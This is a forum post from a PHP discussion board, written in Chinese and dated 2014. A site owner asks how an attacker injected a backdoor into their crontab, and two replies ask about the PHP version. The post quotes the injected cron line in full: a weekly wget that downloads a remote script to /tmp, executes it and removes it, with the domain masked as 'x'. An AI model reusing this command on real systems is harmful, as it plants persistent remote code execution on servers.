Fw: [問題] 被植入後門

看板PHP作者 (看文不要只會用橫的看)時間11年前 (2014/10/01 11:19), 11年前編輯推噓0(002)
留言2則, 2人參與, 最新討論串1/1
我的站台的crontab 被寫入 @weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1 目前已知不影響主機,因為URL已經失效了。 PS.貼出來的URL已經處理過了,domain我改成x,以防被誤點。 但實在找不出他植入的方法,有人知道嗎? PHP是否有什麼漏洞能讓入侵者植入這個script嗎? -- 小惡魔的家 http://blog.pixnet.net/shiuju/ -- ※ 編輯: averywu (60.251.237.155), 10/01/2014 11:20:00

10/01 12:35, , 1F
版本?記得舊版之前有爆出大洞?
10/01 12:35, 1F

10/02 10:27, , 2F
PHP版本是5.3
10/02 10:27, 2F
文章代碼(AID): #1KAtAmnQ (PHP)
文章代碼(AID): #1KAtAmnQ (PHP)